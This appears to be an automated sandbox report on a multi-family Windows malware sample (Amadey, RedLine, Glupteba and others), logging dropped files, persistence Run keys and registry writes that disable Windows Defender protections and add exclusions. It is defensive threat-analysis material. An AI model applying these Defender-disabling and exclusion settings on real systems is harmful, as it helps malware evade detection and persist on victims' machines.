Malware Analysis Report

2025-01-23 09:39

Sample ID 231010-y768aabc66
Target file
SHA256 14f12ce7401d5053a66773e6700addad23fc1d4e64bddabbc445ab198e477647
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan mystic lutyr magia microsoft
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

14f12ce7401d5053a66773e6700addad23fc1d4e64bddabbc445ab198e477647

Threat Level: Known bad

The file was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan mystic lutyr magia microsoft

Suspicious use of NtCreateUserProcessOtherParentProcess

Healer

SmokeLoader

Detect Mystic stealer payload

Detects Healer an antivirus disabler dropper

Mystic

RedLine

Windows security bypass

RedLine payload

SectopRAT payload

Glupteba payload

SectopRAT

Amadey

DcRat

Modifies Windows Defender Real-time Protection settings

Glupteba

Detected google phishing page

Stops running service(s)

Drops file in Drivers directory

Modifies Windows Firewall

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Windows security modification

Loads dropped DLL

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Detected potential entity reuse from brand microsoft.

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies Internet Explorer settings

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:26

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:26

Reported

2023-10-10 20:37

Platform

win7-20230831-en

Max time kernel

150s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E66A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1WK02es6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E8EA.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ECA3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F195.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9535.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9890.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1WK02es6.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F195.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\E2A2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20231010203613.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002bccc567d90a0b479b49b1b2d43318c300000000020000000000106600000001000020000000840ac0de2e39f20267e6589b05d05ab7e01e11b05b74b6f5e33c4e959c144992000000000e8000000002000020000000be63e8069dce961558ac05df72d388b2e007686007973b415f447b1edd9ca73d200000006502765eb3d6f7c143f6c7b3d3755ae79265477a566c91c8bd9a108e672c8724400000003b8c2a1e20b0af98a24e75ec39216bcd34535a66b7a25ded71e822e864bb28f7888fb7db05ef6bbe996805c58107980fc673d058b85fa3e5861fe1fdbf928d6e C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
